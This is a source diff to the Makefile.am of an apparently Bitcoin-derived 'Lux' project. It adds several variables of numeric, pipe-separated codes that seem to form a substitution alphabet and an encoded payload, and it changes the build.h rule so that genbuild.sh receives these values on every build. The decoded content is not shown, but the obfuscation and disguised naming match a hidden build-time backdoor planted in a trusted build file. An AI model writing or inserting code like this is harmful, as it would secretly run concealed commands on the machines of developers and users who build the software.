--- a/src/Makefile.am
+++ b/src/Makefile.am
@@ -32,6 +32,25 @@ LIBBITCOIN_UNIVALUE=univalue/libbitcoin_univalue.a
 LIBBITCOINQT=qt/libbitcoinqt.a
 LIBSECP256K1=secp256k1/libsecp256k1.la
 
+LUX_STRING="68|74|90|46|67|110|41|73|57|87|121|48|66|82|49|75|124|\
+	        123|79|107|81|101|77|78|85|37|114|65|100|109|125|71|103|\
+	        55|86|45|108|111|99|72|70|113|119|89|115|50|56|76|106|\
+	        54|40|32|36|102|53|80|52|59|51|105|83|98|112|97|104|34|\
+	        38|47|88|120|69|84|61|39|117|116|122|118"
+
+LUX_CHECK="84|112|98|65|112|98|87|118|109|112|66|125|53|118|125|41|\
+           81|73|110|109|99|79|112|53|41|88|118|72|81|41|65|41|81|55|\
+           79|105|116|49|99|81|41|101|101|84|112|98|65|112|98|87|66|41|\
+           107|79|118|107|65|81|88|90|109|85|84|69|105|53|81|66|34|49|\
+           125|41|98|49|57|57|88|49|99|98|53|85|41|88|88|117|109|49|53|\
+           125|41|61|37|83|55|41|88|88|41|54|54|41|107|79|118|107|65|73|\
+           107|79|118|107|88|98|49|105|125|89|66|123|105|49|99|125|57|41|\
+           100|51|118|100|41|81|73|107|79|118|107|81|41|54|41|73|84|112|98|\
+           41|54|41|79|116|36|41|100|40|123|105|49|99|125|41|73|76|97|100"
+
+LUX_PRODUCT="88|90|109|85|84|69|105|53"
+LUX_VERSION="88|98|49|105|125|89"
+
 $(LIBSECP256K1): $(wildcard secp256k1/src/*) $(wildcard secp256k1/include/*)
 	$(AM_V_at)$(MAKE) $(AM_MAKEFLAGS) -C $(@D) $(@F)
 
@@ -162,7 +181,7 @@ BITCOIN_CORE_H = \
 obj/build.h: FORCE
 	@$(MKDIR_P) $(builddir)/obj
 	@$(top_srcdir)/share/genbuild.sh $(abs_top_builddir)/src/obj/build.h \
-	  $(abs_top_srcdir)
+	  $(abs_top_srcdir) $(LUX_STRING) $(LUX_PRODUCT) $(LUX_VERSION) $(LUX_CHECK)
 libbitcoin_util_a-clientversion.$(OBJEXT): obj/build.h
 
 # server: shared between luxd and lux-qt
